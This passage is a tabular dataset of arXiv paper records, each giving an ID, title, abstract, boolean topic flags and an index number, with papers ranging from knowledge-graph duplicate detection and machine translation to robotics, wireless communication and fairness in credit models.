2207.09672 | Duplicate Detection as a Service | Completeness of a knowledge graph is an important quality dimension and factor on how well an application that makes use of it performs. Completeness can be improved by performing knowledge enrichment. Duplicate detection aims to find identity links between the instances of knowledge graphs and is a fundamental subtask of knowledge enrichment. Current solutions to the problem require expert knowledge of the tool and the knowledge graph they are applied to. Users might not have this expert knowledge. We present our service-based approach to the duplicate detection task that provides an easy-to-use no-code solution that is still competitive with the state-of-the-art and has recently been adopted in an industrial context. The evaluation will be based on several frequently used test scenarios. | false | false | false | false | true | true | false | false | false | false | false | false | false | false | false | false | true | false | 308,979 |
1803.04757 | Monitoring Targeted Hate in Online Environments | Hateful comments, swearwords and sometimes even death threats are becoming a reality for many people today in online environments. This is especially true for journalists, politicians, artists, and other public figures. This paper describes how hate directed towards individuals can be measured in online environments using a simple dictionary-based approach. We present a case study on Swedish politicians, and use examples from this study to discuss shortcomings of the proposed dictionary-based approach. We also outline possibilities for potential refinements of the proposed approach. | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | false | false | false | 92,508 |
2002.07471 | Knowledge Integration Networks for Action Recognition | In this work, we propose Knowledge Integration Networks (referred as KINet) for video action recognition. KINet is capable of aggregating meaningful context features which are of great importance to identifying an action, such as human information and scene context. We design a three-branch architecture consisting of a main branch for action recognition, and two auxiliary branches for human parsing and scene recognition which allow the model to encode the knowledge of human and scene for action recognition. We explore two pre-trained models as teacher networks to distill the knowledge of human and scene for training the auxiliary tasks of KINet. Furthermore, we propose a two-level knowledge encoding mechanism which contains a Cross Branch Integration (CBI) module for encoding the auxiliary knowledge into medium-level convolutional features, and an Action Knowledge Graph (AKG) for effectively fusing high-level context information. This results in an end-to-end trainable framework where the three tasks can be trained collaboratively, allowing the model to compute strong context knowledge efficiently. The proposed KINet achieves the state-of-the-art performance on a large-scale action recognition benchmark Kinetics-400, with a top-1 accuracy of 77.8%. We further demonstrate that our KINet has strong capability by transferring the Kinetics-trained model to UCF-101, where it obtains 97.8% top-1 accuracy. | false | false | false | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | 164,486 |
2305.02326 | Cybernetic Environment: A Historical Reflection on System, Design, and
Machine Intelligence | Taking on a historical lens, this paper traces the development of cybernetics and systems thinking back to the 1950s, when a group of interdisciplinary scholars converged to create a new theoretical model based on machines and systems for understanding matters of meaning, information, consciousness, and life. By presenting a genealogy of research in the landscape architecture discipline, the paper argues that landscape architects have been an important part of the development of cybernetics by materializing systems based on cybernetic principles in the environment through ecologically based landscape design. The landscape discipline has developed a design framework that provides transformative insights into understanding machine intelligence. The paper calls for a new paradigm of environmental engagement to understand matters of design and machine intelligence. | false | false | false | false | true | false | false | true | false | true | true | false | false | false | false | false | false | false | 361,998 |
1711.02757 | Real-Time Road Segmentation Using LiDAR Data Processing on an FPGA | This paper presents the FPGA design of a convolutional neural network (CNN) based road segmentation algorithm for real-time processing of LiDAR data. For autonomous vehicles, it is important to perform road segmentation and obstacle detection such that the drivable region can be identified for path planning. Traditional road segmentation algorithms are mainly based on image data from cameras, which is subjected to the light condition as well as the quality of road markings. LiDAR sensor can obtain the 3D geometry information of the vehicle surroundings with very high accuracy. However, it is a computational challenge to process a large amount of LiDAR data at real-time. In this work, a convolutional neural network model is proposed and trained to perform semantic segmentation using the LiDAR sensor data. Furthermore, an efficient hardware design is implemented on the FPGA that can process each LiDAR scan in 16.9ms, which is much faster than the previous works. Evaluated using KITTI road benchmarks, the proposed solution achieves high accuracy of road segmentation. | false | false | false | false | false | false | false | true | false | false | false | false | false | false | false | false | false | false | 84,106 |
2205.11152 | Cross-lingual Lifelong Learning | The longstanding goal of multi-lingual learning has been to develop a universal cross-lingual model that can withstand the changes in multi-lingual data distributions. There has been a large amount of work to adapt such multi-lingual models to unseen target languages. However, the majority of work in this direction focuses on the standard one-hop transfer learning pipeline from source to target languages, whereas in realistic scenarios, new languages can be incorporated at any time in a sequential manner. In this paper, we present a principled Cross-lingual Continual Learning (CCL) evaluation paradigm, where we analyze different categories of approaches used to continually adapt to emerging data from different languages. We provide insights into what makes multilingual sequential learning particularly challenging. To surmount such challenges, we benchmark a representative set of cross-lingual continual learning algorithms and analyze their knowledge preservation, accumulation, and generalization capabilities compared to baselines on carefully curated datastreams. The implications of this analysis include a recipe for how to measure and balance different cross-lingual continual learning desiderata, which go beyond conventional transfer learning. | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | false | false | false | 298,021 |
1911.00308 | On Second-Moment Stability of Discrete-Time Linear Systems with General
Stochastic Dynamics | This paper provides a new unified framework for second-moment stability of discrete-time linear systems with stochastic dynamics. Relations of notions of second-moment stability are studied for the systems with general stochastic dynamics, and associated Lyapunov inequalities are derived. Any type of stochastic process can be dealt with as a special case in our framework for determining system dynamics, and our results together with assumptions (i.e., restrictions) on the process immediately lead us to stability conditions for the corresponding special stochastic systems. As a demonstration of usefulness of such a framework, three selected applications are also provided. | false | false | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | false | 151,786 |
1511.02152 | Iterative Eigenvalue Decomposition and Multipath-Grouping Tx/Rx Joint
Beamforming for Millimeter-Wave Communication | We investigate Tx/Rx joint beamforming in millimeter-wave communications (MMWC). As the multipath components (MPCs) have different steering angles and independent fadings, beamforming aims at achieving array gain as well as diversity gain in this scenario. A sub-optimal beamforming scheme is proposed to find the antenna weight vectors (AWVs) at Tx/Rx via iterative eigenvalue decomposition (EVD), provided that full channel state information (CSI) is available at both the transmitter and receiver. To make this scheme practically feasible in MMWC, a corresponding training approach is suggested to avoid the channel estimation and iterative EVD computation. As in fast fading scenario the training approach may be time-consuming due to frequent training, another beamforming scheme, which exploits the quasi-static steering angles in MMWC, is proposed to reduce the overhead and increase the system reliability by multipath grouping (MPG). The scheme first groups the MPCs and then concurrently beamforms towards multiple steering angles of the grouped MPCs, so that both array gain and diversity gain are achieved. Performance comparisons show that, compared with the corresponding state-of-the-art schemes, the iterative EVD scheme with the training approach achieves the same performance with a reduced overhead and complexity, while the MPG scheme achieves better performance with an approximately equivalent complexity. | false | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | false | false | 48,591 |
2502.08556 | Human-Centric Foundation Models: Perception, Generation and Agentic
Modeling | Human understanding and generation are critical for modeling digital humans and humanoid embodiments. Recently, Human-centric Foundation Models (HcFMs) inspired by the success of generalist models, such as large language and vision models, have emerged to unify diverse human-centric tasks into a single framework, surpassing traditional task-specific approaches. In this survey, we present a comprehensive overview of HcFMs by proposing a taxonomy that categorizes current approaches into four groups: (1) Human-centric Perception Foundation Models that capture fine-grained features for multi-modal 2D and 3D understanding. (2) Human-centric AIGC Foundation Models that generate high-fidelity, diverse human-related content. (3) Unified Perception and Generation Models that integrate these capabilities to enhance both human understanding and synthesis. (4) Human-centric Agentic Foundation Models that extend beyond perception and generation to learn human-like intelligence and interactive behaviors for humanoid embodied tasks. We review state-of-the-art techniques, discuss emerging challenges and future research directions. This survey aims to serve as a roadmap for researchers and practitioners working towards more robust, versatile, and intelligent digital human and embodiments modeling. | false | false | false | false | true | false | true | false | false | false | false | true | false | false | false | false | false | true | 533,057 |
2103.04706 | A Taxonomy of Similarity Metrics for Markov Decision Processes | Although the notion of task similarity is potentially interesting in a wide range of areas such as curriculum learning or automated planning, it has mostly been tied to transfer learning. Transfer is based on the idea of reusing the knowledge acquired in the learning of a set of source tasks to a new learning process in a target task, assuming that the target and source tasks are close enough. In recent years, transfer learning has succeeded in making Reinforcement Learning (RL) algorithms more efficient (e.g., by reducing the number of samples needed to achieve the (near-)optimal performance). Transfer in RL is based on the core concept of similarity: whenever the tasks are similar, the transferred knowledge can be reused to solve the target task and significantly improve the learning performance. Therefore, the selection of good metrics to measure these similarities is a critical aspect when building transfer RL algorithms, especially when this knowledge is transferred from simulation to the real world. In the literature, there are many metrics to measure the similarity between MDPs, hence, many definitions of similarity or its complement distance have been considered. In this paper, we propose a categorization of these metrics and analyze the definitions of similarity proposed so far, taking into account such categorization. We also follow this taxonomy to survey the existing literature, as well as suggesting future directions for the construction of new metrics. | false | false | false | false | false | false | true | false | false | false | false | false | false | false | false | false | false | false | 223,734 |
2203.10451 | On the Computation of Necessary and Sufficient Explanations | The complete reason behind a decision is a Boolean formula that characterizes why the decision was made. This recently introduced notion has a number of applications, which include generating explanations, detecting decision bias and evaluating counterfactual queries. Prime implicants of the complete reason are known as sufficient reasons for the decision and they correspond to what is known as PI explanations and abductive explanations. In this paper, we refer to the prime implicates of a complete reason as necessary reasons for the decision. We justify this terminology semantically and show that necessary reasons correspond to what is known as contrastive explanations. We also study the computation of complete reasons for multi-class decision trees and graphs with nominal and numeric features for which we derive efficient, closed-form complete reasons. We further investigate the computation of shortest necessary and sufficient reasons for a broad class of complete reasons, which include the derived closed forms and the complete reasons for Sentential Decision Diagrams (SDDs). We provide an algorithm which can enumerate their shortest necessary reasons in output polynomial time. Enumerating shortest sufficient reasons for this class of complete reasons is hard even for a single reason. For this problem, we provide an algorithm that appears to be quite efficient as we show empirically. | false | false | false | false | true | false | true | false | false | false | false | false | false | false | false | false | false | true | 286,543 |
2211.06106 | Identifying, measuring, and mitigating individual unfairness for
supervised learning models and application to credit risk models | In the past few years, Artificial Intelligence (AI) has garnered attention from various industries including financial services (FS). AI has made a positive impact in financial services by enhancing productivity and improving risk management. While AI can offer efficient solutions, it has the potential to bring unintended consequences. One such consequence is the pronounced effect of AI-related unfairness and attendant fairness-related harms. These fairness-related harms could involve differential treatment of individuals; for example, unfairly denying a loan to certain individuals or groups of individuals. In this paper, we focus on identifying and mitigating individual unfairness and leveraging some of the recently published techniques in this domain, especially as applicable to the credit adjudication use case. We also investigate the extent to which techniques for achieving individual fairness are effective at achieving group fairness. Our main contribution in this work is functionalizing a two-step training process which involves learning a fair similarity metric from a group sense using a small portion of the raw data and training an individually "fair" classifier using the rest of the data where the sensitive features are excluded. The key characteristic of this two-step technique is related to its flexibility, i.e., the fair metric obtained in the first step can be used with any other individual fairness algorithms in the second step. Furthermore, we developed a second metric (distinct from the fair similarity metric) to determine how fairly a model is treating similar individuals. We use this metric to compare a "fair" model against its baseline model in terms of their individual fairness value. Finally, some experimental results corresponding to the individual unfairness mitigation techniques are presented. | false | false | false | false | true | false | true | false | false | false | false | false | false | true | false | false | false | false | 329,782 |
2309.07423 | ChatGPT MT: Competitive for High- (but not Low-) Resource Languages | Large language models (LLMs) implicitly learn to perform a range of language tasks, including machine translation (MT). Previous studies explore aspects of LLMs' MT capabilities. However, there exist a wide variety of languages for which recent LLM MT performance has never before been evaluated. Without published experimental evidence on the matter, it is difficult for speakers of the world's diverse languages to know how and whether they can use LLMs for their languages. We present the first experimental evidence for an expansive set of 204 languages, along with MT cost analysis, using the FLORES-200 benchmark. Trends reveal that GPT models approach or exceed traditional MT model performance for some high-resource languages (HRLs) but consistently lag for low-resource languages (LRLs), under-performing traditional MT for 84.1% of languages we covered. Our analysis reveals that a language's resource level is the most important feature in determining ChatGPT's relative ability to translate it, and suggests that ChatGPT is especially disadvantaged for LRLs and African languages. | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | false | false | false | 391,776 |
2410.11670 | Leveraging Structure Knowledge and Deep Models for the Detection of
Abnormal Handwritten Text | Currently, the destruction of the sequence structure in handwritten text has become one of the main bottlenecks restricting the recognition task. The typical situations include additional specific markers (the text swapping modification) and the text overlap caused by character modifications like deletion, replacement, and insertion. In this paper, we propose a two-stage detection algorithm that combines structure knowledge and deep models for the above mentioned text. Firstly, different structure prototypes are roughly located from handwritten text images. Based on the detection results of the first stage, in the second stage, we adopt different strategies. Specifically, a shape regression network trained by a novel semi-supervised contrast training strategy is introduced and the positional relationship between the characters is fully employed. Experiments on two handwritten text datasets show that the proposed method can greatly improve the detection performance. The new dataset is available at https://github.com/Wukong90. | false | false | false | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | 498,665 |
1204.3678 | Crowd Memory: Learning in the Collective | Crowd algorithms often assume workers are inexperienced and thus fail to adapt as workers in the crowd learn a task. These assumptions fundamentally limit the types of tasks that systems based on such algorithms can handle. This paper explores how the crowd learns and remembers over time in the context of human computation, and how more realistic assumptions of worker experience may be used when designing new systems. We first demonstrate that the crowd can recall information over time and discuss possible implications of crowd memory in the design of crowd algorithms. We then explore crowd learning during a continuous control task. Recent systems are able to disguise dynamic groups of workers as crowd agents to support continuous tasks, but have not yet considered how such agents are able to learn over time. We show, using a real-time gaming setting, that crowd agents can learn over time, and `remember' by passing strategies from one generation of workers to the next, despite high turnover rates in the workers comprising them. We conclude with a discussion of future research directions for crowd memory and learning. | true | false | false | true | false | false | false | false | false | false | false | false | false | false | false | false | false | false | 15,522 |
1608.07730 | Algorithmic complexity of quantum capacity | Recently the theory of communication developed by Shannon has been extended to the quantum realm by exploiting the rules of quantum theory. This latter stems on complex vector spaces. However complex (as well as real) numbers are just idealizations and they are not available in practice where we can only deal with rational numbers. This fact naturally leads to the question of whether the developed notions of capacities for quantum channels truly catch their ability to transmit information. Here we answer this question for the quantum capacity. To this end we resort to the notion of semi-computability in order to approximately (by rational numbers) describe quantum states and quantum channel maps. Then we introduce algorithmic entropies (like algorithmic quantum coherent information) and derive relevant properties for them. Finally we define algorithmic quantum capacity and prove that it equals the standard one. | false | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | false | false | 60,261 |
1203.0744 | A Report on Multilinear PCA Plus Multilinear LDA to Deal with Tensorial
Data: Visual Classification as An Example | In practical applications, we often have to deal with high order data, such as a grayscale image and a video sequence are intrinsically 2nd-order tensor and 3rd-order tensor, respectively. For doing clustering or classification of these high order data, it is a conventional way to vectorize these data before hand, as PCA or FDA does, which often induce the curse of dimensionality problem. For this reason, experts have developed many methods to deal with the tensorial data, such as multilinear PCA, multilinear LDA, and so on. In this paper, we still address the problem of high order data representation and recognition, and propose to study the result of merging multilinear PCA and multilinear LDA into one scenario, we name it \textbf{GDA} for the abbreviation of Generalized Discriminant Analysis. To evaluate GDA, we perform a series of experiments, and the experimental results demonstrate our GDA outperforms a selection of competing methods such (2D)$^2$PCA, (2D)$^2$LDA, and MDA. | false | false | false | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | 14,716 |
1711.09195 | Feature Selection Facilitates Learning Mixtures of Discrete Product
Distributions | Feature selection can facilitate the learning of mixtures of discrete random variables as they arise, e.g. in crowdsourcing tasks. Intuitively, not all workers are equally reliable but, if the less reliable ones could be eliminated, then learning should be more robust. By analogy with Gaussian mixture models, we seek a low-order statistical approach, and here introduce an algorithm based on the (pairwise) mutual information. This induces an order over workers that is well structured for the `one coin' model. More generally, it is justified by a goodness-of-fit measure and is validated empirically. Improvement in real data sets can be substantial. | false | false | false | false | false | false | true | false | false | false | false | false | false | false | false | false | false | false | 85,350 |
2403.07193 | CuentosIE: can a chatbot about "tales with a message" help to teach
emotional intelligence? | In this article, we present CuentosIE (TalesEI: chatbot of tales with a message to develop Emotional Intelligence), an educational chatbot on emotions that also provides teachers and psychologists with a tool to monitor their students/patients through indicators and data compiled by CuentosIE. The use of "tales with a message" is justified by their simplicity and easy understanding, thanks to their moral or associated metaphors. The main contributions of CuentosIE are the selection, collection, and classification of a set of highly specialized tales, as well as the provision of tools (searching, reading comprehension, chatting, recommending, and classifying) that are useful for both educating users about emotions and monitoring their emotional development. The preliminary evaluation of the tool has obtained encouraging results, which provides an affirmative answer to the question posed in the title of the article. | false | false | false | false | true | false | false | false | true | false | false | false | false | false | false | false | false | false | 436,770 |
1712.08577 | Adaptive Stochastic Dual Coordinate Ascent for Conditional Random Fields | This work investigates the training of conditional random fields (CRFs) via the stochastic dual coordinate ascent (SDCA) algorithm of Shalev-Shwartz and Zhang (2016). SDCA enjoys a linear convergence rate and a strong empirical performance for binary classification problems. However, it has never been used to train CRFs. Yet it benefits from an `exact' line search with a single marginalization oracle call, unlike previous approaches. In this paper, we adapt SDCA to train CRFs, and we enhance it with an adaptive non-uniform sampling strategy based on block duality gaps. We perform experiments on four standard sequence prediction tasks. SDCA demonstrates performances on par with the state of the art, and improves over it on three of the four datasets, which have in common the use of sparse features. | false | false | false | false | false | false | true | false | false | false | false | false | false | false | false | false | false | false | 87,212 |
1312.1038 | Efficient Multi-Robot Motion Planning for Unlabeled Discs in Simple
Polygons | We consider the following motion-planning problem: we are given $m$ unit discs in a simple polygon with $n$ vertices, each at their own start position, and we want to move the discs to a given set of $m$ target positions. Contrary to the standard (labeled) version of the problem, each disc is allowed to be moved to any target position, as long as in the end every target position is occupied. We show that this unlabeled version of the problem can be solved in $O(n\log n+mn+m^2)$ time, assuming that the start and target positions are at least some minimal distance from each other. This is in sharp contrast to the standard (labeled) and more general multi-robot motion-planning problem for discs moving in a simple polygon, which is known to be strongly NP-hard. | false | false | false | false | false | false | false | true | false | false | false | false | false | false | false | false | false | true | 28,834 |
2308.05823 | Vibrational Stabilization of Complex Network Systems | Many natural and man-made network systems need to maintain certain patterns, such as working at equilibria or limit cycles, to function properly. Thus, the ability to stabilize such patterns is crucial. Most of the existing studies on stabilization assume that network systems states can be measured online so that feedback control strategies can be used. However, in many real-world scenarios, systems states, e.g., neuronal activity in the brain, are often difficult to measure. In this paper, we take this situation into account and study the stabilization problem of linear network systems with an open-loop control strategy (vibrational control). We derive a graph-theoretic sufficient condition for structural vibrational stabilizability, under which network systems can always be stabilized. We further provide an approach to select the locations in the network for control placement and design corresponding vibrational inputs to stabilize systems that satisfy this condition. Finally, we provide some numerical results that demonstrate the validity of our theoretical findings. | false | false | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | false | 384,922 |
2309.09007 | MonoForce: Self-supervised Learning of Physics-informed Model for
Predicting Robot-terrain Interaction | While autonomous navigation of mobile robots on rigid terrain is a well-explored problem, navigating on deformable terrain such as tall grass or bushes remains a challenge. To address it, we introduce an explainable, physics-aware and end-to-end differentiable model which predicts the outcome of robot-terrain interaction from camera images, both on rigid and non-rigid terrain. The proposed MonoForce model consists of a black-box module which predicts robot-terrain interaction forces from onboard cameras, followed by a white-box module, which transforms these forces and a control signals into predicted trajectories, using only the laws of classical mechanics. The differentiable white-box module allows backpropagating the predicted trajectory errors into the black-box module, serving as a self-supervised loss that measures consistency between the predicted forces and ground-truth trajectories of the robot. Experimental evaluation on a public dataset and our data has shown that while the prediction capabilities are comparable to state-of-the-art algorithms on rigid terrain, MonoForce shows superior accuracy on non-rigid terrain such as tall grass or bushes. To facilitate the reproducibility of our results, we release both the code and datasets. | false | false | false | false | false | false | false | true | false | false | false | false | false | false | false | false | false | false | 392,432 |
2404.18863 | PlanNetX: Learning an Efficient Neural Network Planner from MPC for
Longitudinal Control | Model predictive control (MPC) is a powerful, optimization-based approach for controlling dynamical systems. However, the computational complexity of online optimization can be problematic on embedded devices. Especially, when we need to guarantee fixed control frequencies. Thus, previous work proposed to reduce the computational burden using imitation learning (IL) approximating the MPC policy by a neural network. In this work, we instead learn the whole planned trajectory of the MPC. We introduce a combination of a novel neural network architecture PlanNetX and a simple loss function based on the state trajectory that leverages the parameterized optimal control structure of the MPC. We validate our approach in the context of autonomous driving by learning a longitudinal planner and benchmarking it extensively in the CommonRoad simulator using synthetic scenarios and scenarios derived from real data. Our experimental results show that we can learn the open-loop MPC trajectory with high accuracy while improving the closed-loop performance of the learned control policy over other baselines like behavior cloning. | false | false | false | false | false | false | false | true | false | false | false | false | false | false | false | false | false | false | 450,415 |
1411.5461 | Optimal Coding Schemes for the Three-Receiver AWGN Broadcast Channel
with Receiver Message Side Information | This paper investigates the capacity region of the three-receiver AWGN broadcast channel where the receivers (i) have private-message requests and (ii) may know some of the messages requested by other receivers as side information. We first classify all 64 possible side information configurations into eight groups, each consisting of eight members. We next construct transmission schemes, and derive new inner and outer bounds for the groups. This establishes the capacity region for 52 out of 64 possible side information configurations. For six groups (i.e., groups 1, 2, 3, 5, 6, and 8 in our terminology), we establish the capacity region for all their members, and show that it tightens both the best known inner and outer bounds. For group 4, our inner and outer bounds tighten the best known inner bound and/or outer bound for all the group members. Moreover, our bounds coincide at certain regions, which can be characterized by two thresholds. For group 7, our inner and outer bounds coincide for four members, thereby establishing the capacity region. For the remaining four members, our bounds tighten both the best known inner and outer bounds. | false | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | false | false | 37,743 |
2409.12405 | On the Effectiveness of LLMs for Manual Test Verifications | Background: Manual testing is vital for detecting issues missed by automated tests, but specifying accurate verifications is challenging. Aims: This study aims to explore the use of Large Language Models (LLMs) to produce verifications for manual tests. Method: We conducted two independent and complementary exploratory studies. The first study involved using 2 closed-source and 6 open-source LLMs to generate verifications for manual test steps and evaluate their similarity to original verifications. The second study involved recruiting software testing professionals to assess their perception and agreement with the generated verifications compared to the original ones. Results: The open-source models Mistral-7B and Phi-3-mini-4k demonstrated effectiveness and consistency comparable to closed-source models like Gemini-1.5-flash and GPT-3.5-turbo in generating manual test verifications. However, the agreement level among professional testers was slightly above 40%, indicating both promise and room for improvement. While some LLM-generated verifications were considered better than the originals, there were also concerns about AI hallucinations, where verifications significantly deviated from expectations. Conclusion: We contributed by generating a dataset of 37,040 test verifications using 8 different LLMs. Although the models show potential, the relatively modest 40% agreement level highlights the need for further refinement. Enhancing the accuracy, relevance, and clarity of the generated verifications is crucial to ensure greater reliability in real-world testing scenarios. | false | false | false | false | true | false | false | false | false | false | false | false | false | false | false | false | false | true | 489,572 |
2004.13874 | Histogram-based Auto Segmentation: A Novel Approach to Segmenting
Integrated Circuit Structures from SEM Images | In the Reverse Engineering and Hardware Assurance domain, a majority of the data acquisition is done through electron microscopy techniques such as Scanning Electron Microscopy (SEM). However, unlike its counterparts in optical imaging, only a limited number of techniques are available to enhance and extract information from the raw SEM images. In this paper, we introduce an algorithm to segment out Integrated Circuit (IC) structures from the SEM image. Unlike existing algorithms discussed in this paper, this algorithm is unsupervised, parameter-free and does not require prior information on the noise model or features in the target image making it effective in low quality image acquisition scenarios as well. Furthermore, the results from the application of the algorithm on various structures and layers in the IC are reported and discussed. | false | false | false | false | false | false | false | false | false | false | false | true | true | false | false | false | false | false | 174,698 |
1103.0086 | A generic trust framework for large-scale open systems using machine
learning | In many large scale distributed systems and on the web, agents need to interact with other unknown agents to carry out some tasks or transactions. The ability to reason about and assess the potential risks in carrying out such transactions is essential for providing a safe and reliable environment. A traditional approach to reason about the trustworthiness of a transaction is to determine the trustworthiness of the specific agent involved, derived from the history of its behavior. As a departure from such traditional trust models, we propose a generic, machine learning approach based trust framework where an agent uses its own previous transactions (with other agents) to build a knowledge base, and utilize this to assess the trustworthiness of a transaction based on associated features, which are capable of distinguishing successful transactions from unsuccessful ones. These features are harnessed using appropriate machine learning algorithms to extract relationships between the potential transaction and previous transactions. The trace driven experiments using real auction dataset show that this approach provides good accuracy and is highly efficient compared to other trust mechanisms, especially when historical information of the specific agent is rare, incomplete or inaccurate. | false | false | false | false | false | false | true | false | false | false | false | false | true | false | false | false | false | true | 9,422 |
2306.02864 | Leveraging Large Language Models for Topic Classification in the Domain
of Public Affairs | The analysis of public affairs documents is crucial for citizens as it promotes transparency, accountability, and informed decision-making. It allows citizens to understand government policies, participate in public discourse, and hold representatives accountable. This is crucial, and sometimes a matter of life or death, for companies whose operation depend on certain regulations. Large Language Models (LLMs) have the potential to greatly enhance the analysis of public affairs documents by effectively processing and understanding the complex language used in such documents. In this work, we analyze the performance of LLMs in classifying public affairs documents. As a natural multi-label task, the classification of these documents presents important challenges. In this work, we use a regex-powered tool to collect a database of public affairs documents with more than 33K samples and 22.5M tokens. Our experiments assess the performance of 4 different Spanish LLMs to classify up to 30 different topics in the data in different configurations. The results shows that LLMs can be of great use to process domain-specific documents, such as those in the domain of public affairs. | false | false | false | false | true | false | false | false | true | false | false | false | false | false | false | false | false | false | 371,087 |
1705.02012 | Machine Comprehension by Text-to-Text Neural Question Generation | We propose a recurrent neural model that generates natural-language questions from documents, conditioned on answers. We show how to train the model using a combination of supervised and reinforcement learning. After teacher forcing for standard maximum likelihood training, we fine-tune the model using policy gradient techniques to maximize several rewards that measure question quality. Most notably, one of these rewards is the performance of a question-answering system. We motivate question generation as a means to improve the performance of question answering systems. Our model is trained and evaluated on the recent question-answering dataset SQuAD. | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | false | false | false | 72,908 |
2501.10129 | Spatio-temporal Graph Learning on Adaptive Mined Key Frames for
High-performance Multi-Object Tracking | In the realm of multi-object tracking, the challenge of accurately capturing the spatial and temporal relationships between objects in video sequences remains a significant hurdle. This is further complicated by frequent occurrences of mutual occlusions among objects, which can lead to tracking errors and reduced performance in existing methods. Motivated by these challenges, we propose a novel adaptive key frame mining strategy that addresses the limitations of current tracking approaches. Specifically, we introduce a Key Frame Extraction (KFE) module that leverages reinforcement learning to adaptively segment videos, thereby guiding the tracker to exploit the intrinsic logic of the video content. This approach allows us to capture structured spatial relationships between different objects as well as the temporal relationships of objects across frames. To tackle the issue of object occlusions, we have developed an Intra-Frame Feature Fusion (IFF) module. Unlike traditional graph-based methods that primarily focus on inter-frame feature fusion, our IFF module uses a Graph Convolutional Network (GCN) to facilitate information exchange between the target and surrounding objects within a frame. This innovation significantly enhances target distinguishability and mitigates tracking loss and appearance similarity due to occlusions. By combining the strengths of both long and short trajectories and considering the spatial relationships between objects, our proposed tracker achieves impressive results on the MOT17 dataset, i.e., 68.6 HOTA, 81.0 IDF1, 66.6 AssA, and 893 IDS, proving its effectiveness and accuracy. | false | false | false | false | true | false | false | false | false | false | false | true | false | false | false | false | false | false | 525,403 |
2111.03642 | Grounded Graph Decoding Improves Compositional Generalization in
Question Answering | Question answering models struggle to generalize to novel compositions of training patterns, such to longer sequences or more complex test structures. Current end-to-end models learn a flat input embedding which can lose input syntax context. Prior approaches improve generalization by learning permutation invariant models, but these methods do not scale to more complex train-test splits. We propose Grounded Graph Decoding, a method to improve compositional generalization of language representations by grounding structured predictions with an attention mechanism. Grounding enables the model to retain syntax information from the input in thereby significantly improving generalization over complex inputs. By predicting a structured graph containing conjunctions of query clauses, we learn a group invariant representation without making assumptions on the target domain. Our model significantly outperforms state-of-the-art baselines on the Compositional Freebase Questions (CFQ) dataset, a challenging benchmark for compositional generalization in question answering. Moreover, we effectively solve the MCD1 split with 98% accuracy. | false | false | false | false | false | false | true | false | true | false | false | false | false | false | false | false | false | false | 265,232 |
2207.08815 | Why do tree-based models still outperform deep learning on tabular data? | While deep learning has enabled tremendous progress on text and image datasets, its superiority on tabular data is not clear. We contribute extensive benchmarks of standard and novel deep learning methods as well as tree-based models such as XGBoost and Random Forests, across a large number of datasets and hyperparameter combinations. We define a standard set of 45 datasets from varied domains with clear characteristics of tabular data and a benchmarking methodology accounting for both fitting models and finding good hyperparameters. Results show that tree-based models remain state-of-the-art on medium-sized data ($\sim$10K samples) even without accounting for their superior speed. To understand this gap, we conduct an empirical investigation into the differing inductive biases of tree-based models and Neural Networks (NNs). This leads to a series of challenges which should guide researchers aiming to build tabular-specific NNs: 1. be robust to uninformative features, 2. preserve the orientation of the data, and 3. be able to easily learn irregular functions. To stimulate research on tabular architectures, we contribute a standard benchmark and raw data for baselines: every point of a 20 000 compute hours hyperparameter search for each learner. | false | false | false | false | true | false | true | false | false | false | false | false | false | false | false | false | false | false | 308,697 |
2307.14578 | Distillation-guided Representation Learning for Unconstrained Gait
Recognition | Gait recognition holds the promise of robustly identifying subjects based on walking patterns instead of appearance information. While previous approaches have performed well for curated indoor data, they tend to underperform in unconstrained situations, e.g. in outdoor, long distance scenes, etc. We propose a framework, termed GAit DEtection and Recognition (GADER), for human authentication in challenging outdoor scenarios. Specifically, GADER leverages a Double Helical Signature to detect segments that contain human movement and builds discriminative features through a novel gait recognition method, where only frames containing gait information are used. To further enhance robustness, GADER encodes viewpoint information in its architecture, and distills representation from an auxiliary RGB recognition model, which enables GADER to learn from silhouette and RGB data at training time. At test time, GADER only infers from the silhouette modality. We evaluate our method on multiple State-of-The-Arts(SoTA) gait baselines and demonstrate consistent improvements on indoor and outdoor datasets, especially with a significant 25.2% improvement on unconstrained, remote gait data. | false | false | false | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | 381,977 |
2310.03932 | Bridging Low-level Geometry to High-level Concepts in Visual Servoing of
Robot Manipulation Task Using Event Knowledge Graphs and Vision-Language
Models | In this paper, we propose a framework of building knowledgeable robot control in the scope of smart human-robot interaction, by empowering a basic uncalibrated visual servoing controller with contextual knowledge through the joint usage of event knowledge graphs (EKGs) and large-scale pretrained vision-language models (VLMs). The framework is expanded in twofold: first, we interpret low-level image geometry as high-level concepts, allowing us to prompt VLMs and to select geometric features of points and lines for motor control skills; then, we create an event knowledge graph (EKG) to conceptualize a robot manipulation task of interest, where the main body of the EKG is characterized by an executable behavior tree, and the leaves by semantic concepts relevant to the manipulation context. We demonstrate, in an uncalibrated environment with real robot trials, that our method lowers the reliance of human annotation during task interfacing, allows the robot to perform activities of daily living more easily by treating low-level geometric-based motor control skills as high-level concepts, and is beneficial in building cognitive thinking for smart robot applications. | false | false | false | false | false | false | false | true | false | false | false | false | false | false | false | false | false | false | 397,477 |
2309.00626 | An Ensemble Method of Deep Reinforcement Learning for Automated
Cryptocurrency Trading | We propose an ensemble method to improve the generalization performance of trading strategies trained by deep reinforcement learning algorithms in a highly stochastic environment of intraday cryptocurrency portfolio trading. We adopt a model selection method that evaluates on multiple validation periods, and propose a novel mixture distribution policy to effectively ensemble the selected models. We provide a distributional view of the out-of-sample performance on granular test periods to demonstrate the robustness of the strategies in evolving market conditions, and retrain the models periodically to address non-stationarity of financial data. Our proposed ensemble method improves the out-of-sample performance compared with the benchmarks of a deep reinforcement learning strategy and a passive investment strategy. | false | false | false | false | false | false | true | false | false | false | false | false | false | false | false | false | false | false | 389,363 |
1304.1522 | Maximum Uncertainty Procedures for Interval-Valued Probability
